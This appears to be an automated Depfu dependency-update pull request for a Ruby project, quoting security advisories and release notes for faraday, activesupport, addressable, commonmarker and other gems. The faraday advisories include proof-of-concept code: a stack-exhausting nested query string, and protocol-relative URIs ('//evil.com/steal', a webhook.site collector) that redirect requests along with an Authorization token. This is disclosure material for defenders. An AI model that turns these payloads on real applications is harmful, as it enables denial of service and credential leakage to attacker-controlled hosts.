Depfu

🚨 [security] Update faraday 0.16.2 → 2.14.3 (major)

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 0.16.2 → 2.14.3) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday: Uncontrolled recursion in NestedParamsEncoder allows stack exhaustion DoS via deeply nested query parameters

Uncontrolled Recursion in NestedParamsEncoder Allows Stack Exhaustion DoS via Deeply Nested Query Parameters

Summary

Faraday::NestedParamsEncoder, the default nested query parameter encoder/decoder in Faraday, decodes nested query strings without enforcing a maximum nesting depth.

A crafted query string such as:
a[x][x][x][x]...[x]=1
causes Faraday to build a deeply nested Ruby Hash structure. The internal dehash routine then recursively walks this attacker-controlled structure without a depth limit. At sufficient depth, Ruby raises an uncaught SystemStackError (stack level too deep), crashing the calling thread or worker.

This can lead to denial of service in applications that pass attacker-controlled query strings to Faraday's nested query parsing or URL-building paths.

Affected Product

Product: Faraday

Repository: https://github.com/lostisland/faraday

Tested version: v2.14.2-2-g59334e0

Tested commit: 59334e0e9b19

Ruby version: ruby 3.2.3

Tested component: Faraday::NestedParamsEncoder / Faraday::Utils.parse_nested_query

Date tested: 2026-05-24

Vulnerability Type

Denial of Service

Uncontrolled Recursion

Stack Exhaustion

Preconditions

An application must pass attacker-controlled or attacker-influenced query strings to one of Faraday's nested parameter parsing/building paths.

Confirmed reachable paths include:

Direct use of the public utility:
Faraday::Utils.parse_nested_query(untrusted_query_string)
Normal Faraday request URL building:
conn = Faraday.new('https://api.example.com')
conn.build_url("/search?#{untrusted_query_string}")
In the second case, the crash occurs during URL construction before any network request is sent.

Impact

A relatively small query string can trigger a SystemStackError and crash the calling Ruby thread or worker.

In my local test environment, a payload of approximately 9.4 KB was sufficient:
depth=3119
bytes=9360
result=SystemStackError
message="stack level too deep"
Repeated requests with such payloads may cause a denial of service against applications whose request path forwards, parses, or rebuilds attacker-controlled query strings through Faraday.

This issue does not provide remote code execution, authentication bypass, or data disclosure. The confirmed impact is availability loss.

Technical Details

Faraday supports nested query parameters such as:
user[name]=alice&user[roles][]=admin
which are decoded into nested Ruby structures.

However, Faraday also accepts arbitrarily deep nesting such as:
a[x][x][x][x][x][x]...[x]=1
This creates a deeply nested structure similar to:
{
  "a" => {
    "x" => {
      "x" => {
        "x" => {
          "x" => ...
        }
      }
    }
  }
}
The recursive dehash routine then walks the structure without a maximum depth check.

Affected file:
lib/faraday/encoders/nested_params_encoder.rb
Relevant logic:
def dehash(hash, depth)
  hash.each do |key, value|
    hash[key] = dehash(value, depth + 1) if value.is_a?(Hash)
  end
  # ...
end
Although the function accepts a depth argument, the value is not used to enforce a maximum depth. Therefore, recursion depth is fully controlled by the input query string.

Proof of Concept

PoC 1: Direct parser crash
require 'faraday'

payload = "a#{'[x]' * 3119}=1"
Faraday::Utils.parse_nested_query(payload)
Observed result:
SystemStackError: stack level too deep
PoC 2: Normal URL-building crash
require 'faraday'

conn = Faraday.new('https://api.example.com')
payload = "/search?a#{'[x]' * 3500}=1"
conn.build_url(payload)
Observed result:
SystemStackError
No network request is required; the crash occurs during URL construction.

Local Reproduction Results

The issue was reproduced locally against Faraday commit 59334e0e9b19.

Environment:
ruby 3.2.3
faraday v2.14.2-2-g59334e0
commit 59334e0e9b19
Full PoC result
== (A) DEEP nesting -> dehash recursion / stack exhaustion ==
  depth=100      parse=0.0003s  OK
  depth=1000     parse=0.0034s  OK
  depth=5000     *** SystemStackError (stack overflow DoS): SystemStackError
  depth=20000    *** SystemStackError (stack overflow DoS): SystemStackError
  depth=100000   *** SystemStackError (stack overflow DoS): SystemStackError

== (B) WIDE numeric keys -> dehash sort + numeric-key scan per level ==
  N=1000     parse=0.0093s
  N=10000    parse=0.1053s
  N=50000    parse=0.4992s
  N=100000   parse=1.1242s

== (C) MANY array pushes a[]&a[]&... ==
  N=1000     parse=0.0048s
  N=10000    parse=0.0614s
  N=50000    parse=0.2915s
  N=100000   parse=0.5403s
Minimal depth test
depth=100 bytes=303 result=OK
depth=1000 bytes=3003 result=OK
depth=2500 bytes=7503 result=OK
depth=3000 bytes=9003 result=OK
depth=3119 bytes=9360 result=SystemStackError message="stack level too deep"
depth=3500 bytes=10503 result=SystemStackError message="stack level too deep"
depth=5000 bytes=15003 result=SystemStackError message="stack level too deep"
URL-building test
build_url depth=100 bytes=311 result=OK
build_url depth=1000 bytes=3011 result=OK
build_url depth=3500 bytes=10511 result=SystemStackError
build_url depth=8000 bytes=24011 result=SystemStackError
These results confirm that both direct parsing and normal Faraday URL construction can trigger the stack exhaustion condition.

Expected Behavior

Faraday should reject excessively deep nested query parameters with a controlled and rescuable exception.

For example, behavior similar to Rack's parameter depth limit would prevent stack exhaustion:
Faraday::Error: Exceeded the maximum allowed nested parameter depth
Actual Behavior

Faraday recursively processes attacker-controlled nesting depth and eventually raises:
SystemStackError: stack level too deep
This exception indicates stack exhaustion and can crash the calling worker/thread.

Suggested Fix

Add a configurable maximum nesting depth to Faraday::NestedParamsEncoder, similar to Rack's param_depth_limit.

Suggested behavior:

Set a default maximum depth, for example 100.

Reject keys whose subkey chain exceeds the maximum depth.

Raise a normal Faraday::Error or another controlled exception rather than allowing Ruby stack exhaustion.

Example patch concept:
module Faraday
  module NestedParamsEncoder
    class << self
      attr_accessor :sort_params, :array_indices, :param_depth_limit
    end

    @param_depth_limit = 100
  end
end
Then in decode_pair:
subkeys = key.scan(SUBKEYS_REGEX)
if param_depth_limit && subkeys.length > param_depth_limit
  raise Faraday::Error, "Exceeded the maximum allowed nested parameter depth of #{param_depth_limit}"
end
A local patch implementing this approach was tested. With the patch applied:

The crash payloads raise a controlled Faraday::Error instead of SystemStackError.

Normal nested query parsing still works.

Existing encoder/utils tests passed in the local test set:
42 examples, 0 failures
Security Policy Fit

Faraday's SECURITY.md states that the 2.x branch is supported for security updates and that vulnerabilities should be reported privately.

This issue was reproduced on the current tested 2.x codebase:
v2.14.2-2-g59334e0
commit 59334e0e9b19
The report is intended for private disclosure through GitHub Security Advisories and should not be opened as a public issue before maintainer triage.

Related Public Discussions / Duplicate Check

I searched the public issue tracker, pull requests, changelog, and GitHub Advisory Database for similar reports using terms including:
NestedParamsEncoder
parse_nested_query
SystemStackError
stack level too deep
param_depth_limit
nested parameter depth
Uncontrolled recursion
CWE-674
dehash depth
parse_nested_query depth
I did not find a public report or fix for this specific NestedParamsEncoder depth-limit / SystemStackError denial-of-service issue.

The closest unrelated public items I found were:

lostisland/faraday#1107 — Infinite recursion (SystemStackError) on load when running with -rdebug with breakpoints

This appears unrelated to nested query parameter parsing and Faraday::NestedParamsEncoder.

GHSA-33mh-2634-fwr2 / CVE-2026-25765

This concerns a protocol-relative URL / host override issue and does not address nested query parameter recursion or depth limiting.

Repo-local checks also found no existing param_depth_limit or equivalent mitigation in lib/faraday/encoders/nested_params_encoder.rb.

Severity

Suggested severity: Medium

Rationale:

The attack can be triggered over the network in applications that pass attacker-controlled query strings into Faraday's parsing/building paths.

The payload is small enough to be practical, approximately 9.4 KB in the local reproduction.

No authentication or user interaction is required in affected application patterns.

The confirmed impact is availability only.

Because Faraday is a library, the exact severity depends on how an application exposes the affected parsing/building path to attacker-controlled input. If the maintainers prefer conservative scoring for library reachability, the availability impact could be adjusted accordingly.

Notes

This report does not claim remote code execution, authentication bypass, or information disclosure.

The confirmed issue is an uncontrolled-recursion denial of service condition caused by missing nesting-depth enforcement in Faraday's nested parameter decoder.

No third-party live services were tested. Reproduction was performed only in a local lab environment.

Reporter

Reported by: Emre Koca

Please let me know if you need additional reproduction details, logs, or a patch proposal.

🚨 Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative URI objects still bypass host scoping

Summary

Faraday::Connection#build_exclusive_url still allows protocol-relative host override when the request target is provided as a URI object instead of a String. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and can redirect a request built from a fixed-base Faraday::Connection to an attacker-controlled host while preserving connection-scoped headers such as Authorization.

Affected Component

Repository File(s)/Endpoint(s):

lib/faraday/connection.rb

lib/faraday/request.rb

spec/faraday/connection_spec.rb

spec/faraday/request_spec.rb

Function(s):

Faraday::Connection#build_exclusive_url

Faraday::Connection#run_request

Faraday::Request#url

Faraday::Request#to_env

Version(s) Tested:

Faraday 2.14.1

repository HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Attacker Profile

Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection

Access Required: Ability to supply data that the application converts to URI.parse(...) and passes to conn.get(...), [conn.post](http://conn.post/)(...), or req.url(...)

Capability: Control over a protocol-relative URI such as URI("//evil.example/pwn")

Steps to Reproduce

Use the current repository checkout and load Faraday from lib/.

Build a fixed-base connection and provide a protocol-relative URI object to req.url.

Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.

Observe that the connection-scoped Authorization header remains attached to the off-host request.

Verification Evidence

Environment: macOS, Ruby from local environment, Faraday 2.14.1, faraday-net_http, local WEBrick listener on 127.0.0.1:4567, HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Commands executed:
$ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
$ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'
PoC code (inline):
require "faraday"
require "faraday/net_http"

conn = Faraday.new(url: "http://trusted.example/base", headers: {
  "Authorization" => "Bearer secret-token"
}) { |f| f.adapter :net_http }

target = ["//127.0.0.1:4567", "/pwn"].join
resp = conn.get(URI(target))

puts resp.status
puts resp.body
Exit code: 0

stdout (relevant excerpt):
200
host=127.0.0.1
auth=Bearer secret-token
path=/pwn
stderr (relevant excerpt):
N/A
Artifacts: none

Additional External Confirmation

The issue was also independently reproduced against a public HTTP collector on Faraday 2.14.1 using the default net_http adapter:
require "faraday"
require "faraday/net_http"

conn = Faraday.new(
  url: "http://trusted.example/base",
  headers: { "Authorization" => "Bearer secret-token" }
) { |f| f.adapter :net_http }

target = ["//webhook.site", "/<collector-id>"].join
resp = conn.get(URI(target))
resp.status
# => 200
resp.url.host
# => "webhook.site"
This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.

Supporting Materials

Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2

Existing CVE for the original string-based issue: CVE-2026-25765

Existing regression tests for the string-only fix:

spec/faraday/connection_spec.rb:314-345

Existing test proving supported URI request input:

spec/faraday/request_spec.rb:26-31

Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the
connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com
Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

Reject or strip input that starts with // followed by a non-/ character

Use an allowlist of permitted path prefixes

Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:
def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com
Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

Reject or strip input that starts with // followed by a non-/ character

Use an allowlist of permitted path prefixes

Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:
def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

✳️ github-pages (200 → 232) · Repo

Release Notes

Too many releases to show here. View the full release notes.

Sorry, we couldn’t find anything useful about this release.

↗️ activesupport (indirect, 4.2.11.1 → 5.2.8.1) · Repo · Changelog

Security Advisories 🚨

🚨 ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore

In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when
untrusted user input is written to the cache store using the raw: true parameter, re-reading the result
from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:
data = cache.fetch("demo", raw: true) { untrusted_string }
Versions Affected: rails < 5.2.5, rails < 6.0.4
Not affected: Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the raw option when storing untrusted user input.
Fixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1

Impact

Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,
this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.
In addition to upgrading to the latest versions of Rails, developers should ensure that whenever
they are calling Rails.cache.fetch they are using consistent values of the raw parameter for both
reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,
detect if data was serialized using the raw option upon deserialization.

Workarounds

It is recommended that application developers apply the suggested patch or upgrade to the latest release as
soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using
the raw argument should be double-checked to ensure that they conform to the expected format.

Release Notes

Too many releases to show here. View the full release notes.

↗️ addressable (indirect, 2.7.0 → 2.9.0) · Repo · Changelog

Security Advisories 🚨

🚨 Addressable has a Regular Expression Denial of Service in Addressable templates

Impact

Within the URI template implementation in Addressable, two classes of URI template generate regular expressions vulnerable to catastrophic backtracking:

Templates using the * (explode) modifier with any expansion operator (e.g., {foo*}, {+var*}, {#var*}, {/var*}, {.var*}, {;var*}, {?var*}, {&var*}) generate patterns with nested unbounded quantifiers that are O(2^n) when matched against a maliciously crafted URI.

Templates using multiple variables with the + or # operators (e.g., {+v1,v2,v3}) generate patterns with O(n^k) complexity due to the comma separator being within the matched character class, causing ambiguous backtracking across k variables.

When matched against a maliciously crafted URI, this can result in catastrophic backtracking and uncontrolled resource consumption, leading to denial of service. The first pattern was partially addressed in 2.8.10 for certain operator combinations. Both patterns are fully remediated in 2.9.0.

Users of the URI parsing capabilities in Addressable but not the URI template matching capabilities are unaffected.

Affected Versions

This vulnerability affects Addressable >= 2.3.0 (note: 2.3.0 and 2.3.1 were yanked; the earliest installable release is 2.3.2). It was partially fixed in version 2.8.10 and fully remediated in 2.9.0.

The vulnerability is more exploitable on MRI Ruby < 3.2 and on all versions of JRuby and TruffleRuby. MRI Ruby 3.2 and later ship with Onigmo 6.9, which introduces memoization that prevents catastrophic backtracking for the first class of template. JRuby and TruffleRuby do not implement equivalent memoization and remain vulnerable to all patterns.

This has been confirmed on the following runtimes:

Runtime Status

MRI Ruby 2.6 Vulnerable

MRI Ruby 2.7 Vulnerable

MRI Ruby 3.0 Vulnerable

MRI Ruby 3.1 Vulnerable

MRI Ruby 3.2 Partially vulnerable

MRI Ruby 3.3 Partially vulnerable

MRI Ruby 3.4 Partially vulnerable

MRI Ruby 4.0 Partially vulnerable

JRuby 10.0 Vulnerable

TruffleRuby 21.2 Vulnerable

Workarounds

Upgrade to MRI Ruby 3.2 or later, if your application does not use JRuby or TruffleRuby. The Onigmo memoization introduced in MRI Ruby 3.2 prevents catastrophic backtracking from nested unbounded quantifiers (pattern 1 above — templates using the * modifier). It does not reliably mitigate the O(n^k) multi-variable case (pattern 2), so upgrading Ruby alone may not be sufficient if your templates use {+v1,v2,...} or {#v1,v2,...} syntax.

Avoid using vulnerable template patterns when matching user-supplied input on unpatched versions of the library:

Templates using the * (explode) modifier: {foo*}, {+var*}, {#var*}, {.var*}, {/var*}, {;var*}, {?var*}, {&var*}

Templates using multiple variables with the + or # operators: {+v1,v2}, {#v1,v2,v3}, etc.

Apply a short timeout around any call to Template#match or Template#extract that processes user-supplied data.

References

https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

https://cwe.mitre.org/data/definitions/1333.html

https://www.regular-expressions.info/catastrophic.html

Credits

Discovered in collaboration with @jamfish.

For more information

If you have any questions or comments about this advisory:

Open an issue

Runtime	Status
MRI Ruby 2.6	Vulnerable
MRI Ruby 2.7	Vulnerable
MRI Ruby 3.0	Vulnerable
MRI Ruby 3.1	Vulnerable
MRI Ruby 3.2	Partially vulnerable
MRI Ruby 3.3	Partially vulnerable
MRI Ruby 3.4	Partially vulnerable
MRI Ruby 4.0	Partially vulnerable
JRuby 10.0	Vulnerable
TruffleRuby 21.2	Vulnerable

🚨 Regular Expression Denial of Service in Addressable templates

Impact

Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected.

Patches

The vulnerability was introduced in version 2.3.0 (previously yanked) and has been present in all subsequent versions up to, and including, 2.7.0. It is fixed in version 2.8.0.

Workarounds

The vulnerability can be avoided by only creating Template objects from trusted sources that have been validated not to produce catastrophic backtracking.

References

https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

https://cwe.mitre.org/data/definitions/1333.html

https://www.regular-expressions.info/catastrophic.html

For more information

If you have any questions or comments about this advisory:

Open an issue

Release Notes

2.9.0 (from changelog)

fixes ReDoS vulnerability in Addressable::Template#match (fixes incomplete remediation in 2.8.10)

2.8.10 (from changelog)

fixes ReDoS vulnerability in Addressable::Template#match

2.8.9 (from changelog)

Reduce gem size by excluding test files (#569)

No need for bundler as development dependency (#571, 5fc1d93)

idna/pure: stop building the useless COMPOSITION_TABLE (removes the Addressable::IDNA::COMPOSITION_TABLE constant) (#564)

2.8.8 (from changelog)

Replace the unicode.data blob by a ruby constant (#561)

Allow public_suffix 7 (#558)

2.8.7 (from changelog)

Allow public_suffix 6 (#535)

2.8.6 (from changelog)

Memoize regexps for common character classes (#524)

2.8.5 (from changelog)

Fix thread safety issue with encoding tables (#515)

Define URI::NONE as a module to avoid serialization issues (#509)

Fix YAML serialization (#508)

2.8.4 (from changelog)

Restore Addressable::IDNA.unicode_normalize_kc as a deprecated method (#504)

2.8.3 (from changelog)

Fix template expand level 2 hash support for non-string objects (#499, #498)

2.8.2 (from changelog)

Improve cache hits and JIT friendliness (#486)

Improve code style and test coverage (#482)

Ensure reset of deferred validation (#481)

Resolve normalization differences between IDNA::Native and IDNA::Pure (#408, #492)

Remove redundant colon in Addressable::URI::CharacterClasses::AUTHORITY regex (#438) (accidentally reverted by #449 merge but added back in #492)

2.8.1 (from changelog)

refactor Addressable::URI.normalize_path to address linter offenses (#430)

remove redundant colon in Addressable::URI::CharacterClasses::AUTHORITY regex (#438)

update gemspec to reflect supported Ruby versions (#466, #464, #463)

compatibility w/ public_suffix 5.x (#466, #465, #460)

fixes "invalid byte sequence in UTF-8" exception when unencoding URLs containing non UTF-8 characters (#459)

Ractor compatibility (#449)

use the whole string instead of a single line for template match (#431)

force UTF-8 encoding only if needed (#341)

2.8.0 (from changelog)

fixes ReDoS vulnerability in Addressable::Template#match

no longer replaces + with spaces in queries for non-http(s) schemes

fixed encoding ipv6 literals

the :compacted flag for normalized_query now dedupes parameters

fix broken escape_component alias

dropping support for Ruby 2.0 and 2.1

adding Ruby 3.0 compatibility for development tasks

drop support for rack-mount and remove Addressable::Template#generate

performance improvements

switch CI/CD to GitHub Actions

Does any of this look wrong? Please let us know.

↗️ coffee-script-source (indirect, 1.11.1 → 1.12.2) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ commonmarker (indirect, 0.17.13 → 0.23.12) · Repo · Changelog

Security Advisories 🚨

🚨 Several quadratic complexity bugs may lead to denial of service in Commonmarker

Impact

Several quadratic complexity bugs in commonmarker's underlying cmark-gfm library may lead to unbounded resource exhaustion and subsequent denial of service.

The following vulnerabilities were addressed:

CVE-2023-37463

For more information, consult the release notes for version 0.29.0.gfm.12.

Mitigation

Users are advised to upgrade to commonmarker version 0.23.10.

🚨 Commonmarker vulnerable to to several quadratic complexity bugs that may lead to denial of service

Impact

Several quadratic complexity bugs in commonmarker's underlying cmark-gfm library may lead to unbounded resource exhaustion and subsequent denial of service.

The following vulnerabilities were addressed:

CVE-2023-24824

CVE-2023-26485

For more information, consult the release notes for version 0.23.0.gfm.10 and 0.23.0.gfm.11.

Mitigation

Users are advised to upgrade to commonmarker version 0.23.9.

🚨 Several quadratic complexity bugs may lead to denial of service in Commonmarker

Impact

Several quadratic complexity bugs in commonmarker's underlying cmark-gfm library may lead to unbounded resource exhaustion and subsequent denial of service.

The following vulnerabilities were addressed:

CVE-2023-22483

CVE-2023-22484

CVE-2023-22485

CVE-2023-22486

For more information, consult the release notes for version 0.23.0.gfm.7.

Mitigation

Users are advised to upgrade to commonmarker version 0.23.7.

🚨 Unbounded resource exhaustion in cmark-gfm autolink extension may lead to denial of service

Impact

CommonMarker uses cmark-gfm for rendering Github Flavored Markdown. A polynomial time complexity issue in cmark-gfm's autolink extension may lead to unbounded resource exhaustion and subsequent denial of service.

Patches

This vulnerability has been patched in the following CommonMarker release:

v0.23.6

Workarounds

Disable use of the autolink extension.

References

#190
GHSA-cgh3-p57x-9q7q
https://en.wikipedia.org/wiki/Time_complexity

For more information

If you have any questions or comments about this advisory:

Open an issue in github/cmark-gfm

Acknowledgements

We would like to thank Legit Security for reporting this vulnerability.

🚨 Integer overflow in cmark-gfm table parsing extension leads to heap memory corruption

Impact

CommonMarker uses cmark-gfm for rendering Github Flavored Markdown. An integer overflow in cmark-gfm's table row parsing may lead to heap memory corruption when parsing tables who's marker rows contain more than UINT16_MAX columns. The impact of this heap corruption ranges from Information Leak to Arbitrary Code Execution.

If affected versions of CommonMarker are used for rendering remote user controlled markdown, this vulnerability may lead to Remote Code Execution (RCE).

Patches

This vulnerability has been patched in the following CommonMarker release:

v0.23.4

Workarounds

The vulnerability exists in the table markdown extensions of cmark-gfm. Disabling any use of the table extension will prevent this vulnerability from being triggered.

References

GHSA-mc3g-88wq-6f4x

Acknowledgements

We would like to thank Felix Wilhelm of Google's Project Zero for reporting this vulnerability

For more information

If you have any questions or comments about this advisory:

Open an issue in CommonMarker

Release Notes

0.23.12

Full Changelog: v0.23.11...v0.23.12

0.23.11

What's Changed

[0.x] Fix memory leaks of string buffers by @jhawthorn in #320

New Contributors

@jhawthorn made their first contribution in #320

Full Changelog: v0.23.10...v0.23.11

0.23.10

What's Changed

Update to 0.29.0.gfm.13 by @anticomputer in #247

Full Changelog: v0.23.9...v0.23.10

0.23.9

What's Changed

Update to 0.29.0.gfm.11 by @anticomputer in #236

Full Changelog: v0.23.8...v0.23.9

0.23.8

What's Changed

Update cmark-upstream to 0.29.0.gfm.9 by @smockle in #227

New Contributors

@smockle made their first contribution in #227

Full Changelog: v0.23.7...v0.23.8

0.23.7

What's Changed

C API stable test by @gjtorikian in #201

Update to 29.0.gfm.7 by @anticomputer in #224

Full Changelog: v0.23.6...v0.23.7

0.23.6

What's Changed

This release includes two updates from the upstream cmark-gfm library, namely:

DoS vulnerability in autolink extension per GHSA-cgh3-p57x-9q7q

Added xmpp: and mailto: support to the autolink extension

0.22.0

Drop ruby-enum (#140)

0.21.0

Add support for tasklist_item_checked=: #116

0.19.0

Support tasklists: #94

Indicate the context of a parse/render option error: #97

0.18.0

Default to being safe: #81

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ concurrent-ruby (indirect, 1.1.5 → 1.3.7) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ dnsruby (indirect, 1.61.3 → 1.73.1) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ em-websocket (indirect, 0.5.1 → 0.5.3) · Repo · Changelog

Commits

See the full diff on Github. The new version differs by 24 commits:

↗️ ethon (indirect, 0.12.0 → 0.18.0) · Repo · Changelog

Release Notes

0.18.0 (from changelog)

Full Changelog

Fixed verbose mode attempting to print binary SSL data by replacing it with a summary. (Felipe Mesquita, #265)

Fixed on_headers callbacks being called once per header line instead of once for all headers. (Felipe Mesquita, #264)

Stabilized test server boot on macOS by fixing IPv6/IPv4 localhost resolution and preventing orphaned processes. (Geremia Taglialatela, #261)

Added logger to runtime dependencies for Ruby 3.5+ compatibility. (Geremia Taglialatela, #259)

Opted-in for MFA requirement explicitly by adding rubygems_mfa_required metadata. (Geremia Taglialatela, #257)

Removed redundant encoding and require_relative checks. (Geremia Taglialatela, #258)

0.17.0 (from changelog)

Full Changelog

Require Ruby 2.6+ and simplify Gemfile. (Felipe Mesquita, #255)

Fixed mismatched libcurl error codes in easy_codes array. (Felipe Mesquita, #253)

Add Ruby 3.3 and 3.4, remove Ruby 2.5 from CI matrix. (Felipe Mesquita, #252)

Skip test due to libcurl 8.7.x bug in CURLINFO_REQUEST_SIZE. (Felipe Mesquita, #251)

Use Rackup::Handler.default for Rack 3 compatibility. (Vít Ondruch, #244)

Add Ruby 3.1 and 3.2 to the test matrix. (Orien Madgwick, #228)

Remove development and test files from the gem package. (Orien Madgwick, #227)

Fix missing parenthesis in example. (Aleksey Tsalolikhin, #226)

0.15.0 (from changelog)

Full Changelog

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ execjs (indirect, 2.7.0 → 2.10.1) · Repo

Release Notes

2.10.1

What's Changed

Fix a redefined method warning.

Full Changelog: v2.10.0...v2.10.1

2.8.1

Wait for STDOUT to be flushed before exiting the node runtime

2.8.0

Fix Ruby 3.0 compatibility on Windows

Undefine console, process and other globals. See #43

Removed the RubyRacer runtime as it is no longer maintained and broken on recent rubies.

Node runtime look for node before nodejs.

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ ffi (indirect, 1.11.1 → 1.17.4) · Repo · Changelog

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ gemoji (indirect, 3.0.1 → 4.1.0) · Repo

Release Notes

4.1.0

What's Changed

Import Emoji 15.0 characters by @mislav in #261

Support skin tones for 🧑‍🤝‍🧑 emoji by @mislav in #262

Full Changelog: v4.0.1...v4.1.0

4.0.1

What's Changed

Fix Ruby 2.6 breakage by @perlun in #255

New Contributors

@perlun made their first contribution in #255

Full Changelog: v4.0.0...v4.0.1

4.0.0

What's New

Warning
See the v4.0.0.pre0 release notes for the list of breaking changes since gemoji v3.x.

Add skin tones support by @mislav in #165 ✌🏻✌🏼✌🏽✌🏾✌🏿

Emoji.find_by_unicode() now recognizes emoji sequences with skin tone modifiers.

Emoji::Character#skin_tones? returns true when an emoji supports skin tone modifiers.

Emoji::Character#raw_skin_tone_variants generates a list of all 5 skin tone variants for an emoji.

Import Emoji 13.0 characters by @chvp in #173

Import Emoji 13.1 characters by @franciscorode in #209

Import Emoji 14.0 characters by @kardeslik in #244

What's Changed

Fix ArgumentError in emoji-test-parser by @JuanitoFatas in #169

Remove underscore from "piñata" by @PurpleBooth in #182

Safely transliterate international characters for aliases by @PurpleBooth in #181

Sort out envelope and email aliases by @jobveldhuis in #185

Set up CI via GitHub Actions by @mislav in #183 #252

Touch up emoji integrity tests by @mislav in #253

New Contributors

@JuanitoFatas made their first contribution in #169

@chvp made their first contribution in #173

@PurpleBooth made their first contribution in #182

@jobveldhuis made their first contribution in #185

@franciscorode made their first contribution in #209

@kardeslik made their first contribution in #244

Full Changelog: v4.0.0.pre0...v4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ github-pages-health-check (indirect, 1.16.1 → 1.18.2) · Repo

Release Notes

